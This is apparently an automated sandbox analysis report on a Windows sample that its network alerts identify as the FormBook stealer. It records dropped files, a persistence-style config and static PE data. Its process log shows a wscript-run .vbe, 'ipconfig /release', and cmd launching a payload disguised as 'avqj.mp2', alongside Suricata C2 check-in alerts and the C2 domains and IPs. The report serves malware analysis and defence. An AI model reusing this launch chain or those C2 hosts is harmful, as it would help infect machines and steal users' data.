                                            SHA-512:7009BBE1350006D000A642825CE71F3E3F81AC4D23867370A634AD2E898DA73BDBD8FDF00AE81B1CE6ADB15CA53113C21B2AE463ED08D0F4E89F063B1FB4BCDD
                                            Malicious:false
                                            Preview:1958S9A5Z71..StructureConstants StructureConstants..h9M08en7k50vU06Qogf26V41289a7A5527s0EQN8L42oe85BJZ2c735YN7391N15vP7U215E5aw26CZ229A15k1Tb7F94Y41YK2..GuiDateTimePicker FontConstants..0s98L762..ToolTipConstants FontConstants..8UNPlmj4x79o7KtS4k3G7C223Hdl2e24PI85h1pOa454D90L1x67m3J1BYS2711..ToolTipConstants ToolTipConstants..Aon5P96r3a7qk0B98Gi6704V5b4732t51Q01a9lt588z3o7v4e988DCmJ7r27Bn15yiW8x5p3LIOIJs5p5fER7oj287l20yL2m0IVc2c33Er5vY83q31E5Osj0NakAoH1..BorderConstants ToolbarConstants..Zo29oC9Y3J8s..ButtonConstants StructureConstants..

                                            C:\Users\user\ruum\stsqqfbnw.icm

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):511
                                            Entropy (8bit):5.562757017036334
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:401F32A62946ED2570AB95938A444C0B
                                            SHA1:1E3CDF6F880E551FF15927464BA80FA530C812FB
                                            SHA-256:1AB944D42D9A110EEB8B447ACAB4C6A5EB97CCB9C6E82A5C2FB6D5C83764F660
                                            SHA-512:306C2BD55FA5A3B3BF204DD2FD42878CC53539D284BFD9DB97FBDDA788ABA628CD65A1A99A1D75E7B3AFD67AFF8C6B12A0EF82D0911B5972C5EDD0E4F694FBA2
                                            Malicious:false
                                            Preview:wmd7skr1QMY0P8HqthD1..UpDownConstants DateTimeConstants..92L7H83ZUR3800DI5Q0eZ3Z0031290j21K5B25E2grpf2034y48727yYjKlZAD8knx5o2977762d5EbScg51W9JJ3TYnJG2G4x1H445N0W9I674cjs1382a3w7J9J6nr22cd0tf8liAL36b..UpDownConstants ButtonConstants..qs8kf458gl8..ButtonConstants GuiDateTimePicker..34B6v8i06kvmh2e11Xhf3eGO2S98U0v9X7d96Q89351n8i0y6p19Vb0M02231r36Pl8MQ99332a79I1Z5146izA12T7984Dr37YYZJI8Yky8Xx6F33aF5..DateTimeConstants FontConstants..700o9ojj1fAMy9Dd9368t3y242sNJe5hM31sKhR603..ToolTipConstants FileConstants..

                                            C:\Users\user\ruum\urbbvdkhg.das

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):585
                                            Entropy (8bit):5.556687161391297
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:4AC2B920915EA8CB53C91208B2C67596
                                            SHA1:447FBD98D629039FC58103893E170797AB82CFB3
                                            SHA-256:494934E9B75A40123547C78C584B2D70CD87EC91357EA105CF8515DA2F21F35E
                                            SHA-512:0BCD49206A30E24D420AE9857530915EFC3E2CA75777DE4B6CE7280A134115766B68F1EC4B11D1B0A3367228E2F8181B336D968B618184EEC7AFEE0E834E77D0
                                            Malicious:false
                                            Preview:n9q73751HDh9ae818R2911L253k991ZNmD7SHa8Gmg6uT6W50wo1l1Lse..TreeViewConstants ButtonConstants..nZMAs1s5WZZBEM5wc5sOezWX6894wU3iC44Q39X20N1L5x64YWtdP23Gt0nx0EaCd883p3935WR7MH0..GuiDateTimePicker ColorConstants..8SgX84j1A0OtlhZO84O78l1A4m5322wc0P1H9734q737o5Aj8563YZBl4T69Ka69ON23x87w073t98sOH7o2f6CAVAT4xOq173pqA2977631149Wi8791G..DateTimeConstants ToolTipConstants..pfH7h9390WY692S4L48o0r5F1cl1X120292S01f37385zh620RE8WMs72488A0MT18P9a402kGQK4y4B0c18Tm9u15r500r1L14967k94106sxtR74ngzFV3zjd9pFR2c19K8w4611l484kfjOyy4qs6209090959B8l656S696r98Y694kIM91..UpDownConstants GuiDateTimePicker..

                                            C:\Users\user\ruum\vdfovnd.msc

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):534
                                            Entropy (8bit):5.499310994661674
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:C6B5B5E6F4B85ED8220AC9D2E0C192D2
                                            SHA1:5A3508CEC5AB3EB2E13CE51D375B644256964941
                                            SHA-256:DB7C678CC3F9E92857EA22C3648973E54BE21C840C0457DBF54C36A07CEDF374
                                            SHA-512:3EFF207263D3B6BC5F87BA296F715FFA2A3F74FEFAD443A6895ABD55370E975FB3EB029AA16D0EA7B7F5C5AD0A913C014BC8A251B68E552382B4D2952653BA84
                                            Malicious:false
                                            Preview:67389r2fv952703hOL54vhKZ65XlgFA77u248g5931sO..BorderConstants FileConstants..0X188R3WQvs0046Ho2yn61h97Wa11quEjLHGcX52623As8725cGifZ04DnPYYre643j52Dm7YsHTb3qmjS35L8c8Z97b1806R..FontConstants GuiDateTimePicker..hZ5R842M952714312iEANN0S0Eu43496044r05v0Ev45uCFpF1tE3CoA33S8JQe67f8i7l05..ColorConstants ColorConstants..4zh3tU2h02H912..FileConstants ToolbarConstants..269b20uVot1a1537c779Fo37uh75P1OuttD6N04210Xm9k26slr1u6o677PEdqx0iU6E5mV1hq4bjJ4U816a85u1aZ1679OX3jH6836jm0ZJalAXXBe883813h0093Tl8ij833d2E..ColorConstants ToolTipConstants..

                                            C:\Users\user\ruum\wdsw.bmp

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):537
                                            Entropy (8bit):5.55629923462043
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:DD5F53DE2275E35D718066F0178B5F35
                                            SHA1:788A5DE3666271F43846D7A8C822D75348CE0534
                                            SHA-256:39AF59E1FAD2D7A7B2C68CA8BCE6253396F5B20E7364C421B4336091C8426904
                                            SHA-512:EB844EE731E4D6478ABC2F31D056D5CB67ED6F90A3BECADD1E50D9AA00C13D9A639111DE280AD9BB286A3BDA4F07BADDDA7543E014FAA513EC6983C497E78959
                                            Malicious:false
                                            Preview:1l3au13S4jpP0mxfB0A6679..ComboConstants FileConstants..y1tt2h0x65..FileConstants ColorConstants..fHueA831D2L52s2996o063964SO6cYvSHq57626G2I12U671hQf5C5o4HW25w4S9j..GuiDateTimePicker UpDownConstants..85m4hOYUlXNH80lp3uQO9bB8M2IWm817V262We6m1X705GAS90laN7301D6qr4EVLiZB951dt5tQ6852RJ949yCOgJJ6Z389R4Ug98x14yH92Z8O3w7Kej..UpDownConstants FileConstants..122O1768473W2j8v2y38x08W9Fx87x8a6u89Y9aX5Sa27c964NZ..DateTimeConstants TreeViewConstants..36CC6o9118ytdBHjEmZ5t45c947g9ZQnzc8C224qn84wcHP336iLypP190..TreeViewConstants TreeViewConstants..

                                            C:\Users\user\ruum\xfer.das

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):616
                                            Entropy (8bit):5.578959754900461
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:5D40EF3055F3411CEDD99FFDA78AEB6A
                                            SHA1:40DCA8CBCC56E86DFEDDEC3D9B97EAB3C16AB293
                                            SHA-256:FAEB0905278B1CF6F15CB452231D4AB3660B1AC964B44C3AA5FE23C3D4B42F7C
                                            SHA-512:48C2077AA4DF87063F5F7F14D3639CA65D44CE6082870F85AEB7968428797FE6049EE9AF68B2FA14689381046BE1650E4C49E7CC35E860AA79CE58D8C0E0EBC8
                                            Malicious:false
                                            Preview:2387Xkp71165j82B700004CJ3z5766gn991895Va4CEUr8N725M75Q4Ma1np35lKLL2R..ColorConstants ToolTipConstants..05938Gql9135GJ1JCws7314lAmd4L65g7RPs579I4251RGg93x42aN94mtQXP3V2qFqXl9wQ9lZo49kY3zd9Cl8..ToolbarConstants ToolTipConstants..j9F7nq179k418MBr69gC0OVz7656A71273GrP58562mcO054A9HZ57A4wPL2tK23088aiS98356cOea83u6ca2yd7GtWT7qqI5OW1c254ff4..GuiDateTimePicker ToolbarConstants..J4bvf8187083gpeyqg360MMy75uy3hDndoR0107T99YY5L996LL6033lOLHU6Ypj1OJ1nd6w0I5b87e3Bh2..ButtonConstants ToolTipConstants..93kgXG4u68N4wb1el8162144y7S8380O3GgGnRtx5a1ZO6s1YcdRojJ8n0ip51d126dW1t6g461wI72N0ZDxk4bz4..ToolbarConstants ComboConstants..

                                            C:\Users\user\temp\jqipcptnh.das

                                            Download File
                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):84
                                            Entropy (8bit):5.027991721182001
                                            Encrypted:false
                                            SSDEEP:
                                            MD5:D83D800C99EE4F3EC5D5A4E21DAB8D8D
                                            SHA1:18095FA1F479692FDB783E430BB4B6712F517346
                                            SHA-256:7C19D455CBC019F7B44AE40359C217189A82AEED33695A444EF7F441E5D3DB8E
                                            SHA-512:67215D3E168D4AD2F6F156EA4AFD0725C8BDF9F491FE84D92C969110A5B51DF36DD7B2E00F39BEF8FD88F0AC82964AD63E444C75D514D3C6E9F382C67B033C41
                                            Malicious:false
                                            Preview:[S3tt!ng]..stpths=%userprofile%..Key=WindowsUpdate..Dir3ctory=ruum..ExE_c=avqj.mp2..

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Entropy (8bit):7.815237922079781
                                            TrID:
                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                            • DOS Executable Generic (2002/1) 0.02%
                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                            File name:u549ed5dEA.exe
                                            File size:1'323'723 bytes
                                            MD5:9c520c748bec9e504a1911bb4d975732
                                            SHA1:1931d33ef9ea91279c3ad469e97c04e1e8cbd93a
                                            SHA256:f3c0f469753fe8f40c2f45cee815d8afb9fa2b54f2b6a32a14bf3dd1db56f3b7
                                            SHA512:5c99e5cad1edc66462a9f31dc47a3018342c6f5268e8d187dd77f1442c7038671996e2eb7eb27d751d3650ca828e8896a673b57ef46d6325d3fedc397883adf0
                                            SSDEEP:24576:iN/BUBb+tYjBFHk+/VKEKhkiM70vvMBGdoenXiM0hD6di/A1:CpUlRhkI4m0vZ1XiM0hDTO
                                            TLSH:AA5512027BC48073D1B225315AB29754197D7E605FA18A9B53D03DBE9F70AC2D632FA3
                                            File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v..p2.b#2.b#2.b#.E.#?.b#.E.#..b#.E.#*.b#...#0.b#..f"!.b#..a"*.b#..g"..b#;..#9.b#;..#5.b#2.c#,.b#..g"..b#..b"3.b#...#3.b#..`"3.b

                                            File Icon

                                            Icon Hash:3371f1a5e1534a33

                                            Static PE Info

                                            General

                                            Entrypoint:0x4265d0
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x6640971F [Sun May 12 10:17:03 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:5
                                            OS Version Minor:1
                                            File Version Major:5
                                            File Version Minor:1
                                            Subsystem Version Major:5
                                            Subsystem Version Minor:1
                                            Import Hash:99ee65c2db82c04251a5c24f214c8892

                                            Entrypoint Preview

                                            Instruction
                                            call 00007F60AC7E473Bh
                                            jmp 00007F60AC7E40BDh
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            push ecx
                                            lea ecx, dword ptr [esp+08h]
                                            sub ecx, eax
                                            and ecx, 0Fh
                                            add eax, ecx
                                            sbb ecx, ecx
                                            or eax, ecx
                                            pop ecx
                                            jmp 00007F60AC7E376Fh
                                            push ecx
                                            lea ecx, dword ptr [esp+08h]
                                            sub ecx, eax
                                            and ecx, 07h
                                            add eax, ecx
                                            sbb ecx, ecx
                                            or eax, ecx
                                            pop ecx
                                            jmp 00007F60AC7E3759h
                                            push ebp
                                            mov ebp, esp
                                            sub esp, 0Ch
                                            lea ecx, dword ptr [ebp-0Ch]
                                            call 00007F60AC7D6C99h
                                            push 0044634Ch
                                            lea eax, dword ptr [ebp-0Ch]
                                            push eax
                                            call 00007F60AC7E4F67h
                                            int3
                                            jmp 00007F60AC7EAC9Eh
                                            int3
                                            int3
                                            push 004293C0h
                                            push dword ptr fs:[00000000h]
                                            mov eax, dword ptr [esp+10h]
                                            mov dword ptr [esp+10h], ebp
                                            lea ebp, dword ptr [esp+10h]
                                            sub esp, eax
                                            push ebx
                                            push esi
                                            push edi
                                            mov eax, dword ptr [00449778h]
                                            xor dword ptr [ebp-04h], eax
                                            xor eax, ebp
                                            push eax
                                            mov dword ptr [ebp-18h], esp
                                            push dword ptr [ebp-08h]
                                            mov eax, dword ptr [ebp-04h]
                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                            mov dword ptr [ebp-08h], eax
                                            lea eax, dword ptr [ebp-10h]
                                            mov dword ptr fs:[00000000h], eax
                                            ret
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            int3
                                            mov ecx, dword ptr [ebp-10h]
                                            mov dword ptr fs:[00000000h], ecx
                                            pop ecx
                                            pop edi
                                            pop edi
                                            pop esi
                                            pop ebx
                                            mov esp, ebp
                                            pop ebp
                                            push ecx
                                            ret
                                            push ebp
                                            mov ebp, esp

                                            Rich Headers

                                            Programming Language:
                                            • [ C ] VS2008 SP1 build 30729
                                            • [IMP] VS2008 SP1 build 30729

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x47d700x34.rdata
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x47da40x50.rdata
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x580000x17ee4.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x700000x2afc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x445800x54.rdata
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x446000x18.rdata
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3ec580x40.rdata
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x3c0000x280.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x4722c0x120.rdata
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x3a32c0x3a400e320764e1b3c816ba80aeb820cb8a274False0.581381605418455data6.685359764265178IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x3c0000xcbf80xcc0047c3be3304bfdfb2a778f355849d1c3fFalse0.4439529718137255data5.167069652624378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x490000xd7e00x12006335f9314c2900dccb530e151f1b1ee8False0.3956163194444444data4.0290550032041IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .didat0x570000x1a80x200232a8fe82993b55cefe09cffc39a79b0False0.462890625data3.5080985761326375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x580000x17ee40x180007a6f4fdc915a9e791c0d436729708e3aFalse0.7992757161458334data7.356836112369401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x700000x2afc0x2c0098fd4bc572f87a21f69dc57f720a6dbcFalse0.75data6.617141671767599IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            PNG0x587040xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                            PNG0x5924c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                            RT_ICON0x5a7f80x668Device independent bitmap graphic, 48 x 96 x 4, image size 11520.374390243902439
                                            RT_ICON0x5ae600x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 5120.4435483870967742
                                            RT_ICON0x5b1480x128Device independent bitmap graphic, 16 x 32 x 4, image size 1280.5608108108108109
                                            RT_ICON0x5b2700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.6396588486140725
                                            RT_ICON0x5c1180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.7256317689530686
                                            RT_ICON0x5c9c00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.4624277456647399
                                            RT_ICON0x5cf280xcdffPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9972693656964066
                                            RT_ICON0x69d280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.5239626556016598
                                            RT_ICON0x6c2d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.6015478424015009
                                            RT_ICON0x6d3780x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.7783687943262412
                                            RT_DIALOG0x6d7e00x286dataEnglishUnited States0.5092879256965944
                                            RT_DIALOG0x6da680x13adataEnglishUnited States0.60828025477707
                                            RT_DIALOG0x6dba40xecdataEnglishUnited States0.6991525423728814
                                            RT_DIALOG0x6dc900x12edataEnglishUnited States0.5927152317880795
                                            RT_DIALOG0x6ddc00x338dataEnglishUnited States0.45145631067961167
                                            RT_DIALOG0x6e0f80x252dataEnglishUnited States0.5757575757575758
                                            RT_STRING0x6e34c0x1e2dataEnglishUnited States0.3900414937759336
                                            RT_STRING0x6e5300x1ccdataEnglishUnited States0.4282608695652174
                                            RT_STRING0x6e6fc0x1b8dataEnglishUnited States0.45681818181818185
                                            RT_STRING0x6e8b40x146dataEnglishUnited States0.5153374233128835
                                            RT_STRING0x6e9fc0x46cdataEnglishUnited States0.3454063604240283
                                            RT_STRING0x6ee680x166dataEnglishUnited States0.49162011173184356
                                            RT_STRING0x6efd00x152dataEnglishUnited States0.5059171597633136
                                            RT_STRING0x6f1240x10adataEnglishUnited States0.49624060150375937
                                            RT_STRING0x6f2300xbcdataEnglishUnited States0.6329787234042553
                                            RT_STRING0x6f2ec0x1c0dataEnglishUnited States0.5178571428571429
                                            RT_STRING0x6f4ac0x250dataEnglishUnited States0.44256756756756754
                                            RT_GROUP_ICON0x6f6fc0x92data0.6438356164383562
                                            RT_MANIFEST0x6f7900x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                            Imports

                                            DLLImport
                                            KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA, FindNextFileA
                                            OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                            gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2025-01-08T16:21:22.629497+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549977188.114.96.380TCP
                                            2025-01-08T16:21:39.804507+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549978206.238.89.11980TCP
                                            2025-01-08T16:21:42.398283+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549979206.238.89.11980TCP

                                            Network Port Distribution

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 8, 2025 16:21:21.921103954 CET5613953192.168.2.51.1.1.1
                                            Jan 8, 2025 16:21:21.934520006 CET53561391.1.1.1192.168.2.5
                                            Jan 8, 2025 16:21:37.735791922 CET6217753192.168.2.51.1.1.1
                                            Jan 8, 2025 16:21:38.227185965 CET53621771.1.1.1192.168.2.5

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Jan 8, 2025 16:21:21.921103954 CET192.168.2.51.1.1.10x95bcStandard query (0)www.supernutra01.onlineA (IP address)IN (0x0001)false
                                            Jan 8, 2025 16:21:37.735791922 CET192.168.2.51.1.1.10xae27Standard query (0)www.127358.winA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Jan 8, 2025 16:21:21.934520006 CET1.1.1.1192.168.2.50x95bcNo error (0)www.supernutra01.online188.114.96.3A (IP address)IN (0x0001)false
                                            Jan 8, 2025 16:21:21.934520006 CET1.1.1.1192.168.2.50x95bcNo error (0)www.supernutra01.online188.114.97.3A (IP address)IN (0x0001)false
                                            Jan 8, 2025 16:21:38.227185965 CET1.1.1.1192.168.2.50xae27No error (0)www.127358.win206.238.89.119A (IP address)IN (0x0001)false

                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:10:18:59
                                            Start date:08/01/2025
                                            Path:C:\Users\user\Desktop\u549ed5dEA.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\u549ed5dEA.exe"
                                            Imagebase:0xc90000
                                            File size:1'323'723 bytes
                                            MD5 hash:9C520C748BEC9E504A1911BB4D975732
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:2
                                            Start time:10:19:04
                                            Start date:08/01/2025
                                            Path:C:\Windows\SysWOW64\wscript.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe"
                                            Imagebase:0xdd0000
                                            File size:147'456 bytes
                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:10:19:13
                                            Start date:08/01/2025
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                            Imagebase:0x790000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:4
                                            Start time:10:19:14
                                            Start date:08/01/2025
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:10:19:14
                                            Start date:08/01/2025
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /c avqj.mp2 awggmrd.xls
                                            Imagebase:0x790000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:6
                                            Start time:10:19:14
                                            Start date:08/01/2025
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:7
                                            Start time:10:19:14
                                            Start date:08/01/2025
                                            Path:C:\Windows\SysWOW64\ipconfig.exe
                                            Wow64 process (32bit):true
                                            Commandline:ipconfig /release
                                            Imagebase:0xf30000
                                            File size:29'184 bytes
                                            MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:8
                                            Start time:10:19:14
                                            Start date:08/01/2025
                                            Path:C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2
                                            Wow64 process (32bit):true
                                            Commandline:avqj.mp2 awggmrd.xls
                                            Imagebase:0xe80000
                                            File size:947'288 bytes
                                            MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 0%, ReversingLabs
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:10
                                            Start time:10:19:17
                                            Start date:08/01/2025
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                            Imagebase:0x790000
                                            File size:236'544 bytes
                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

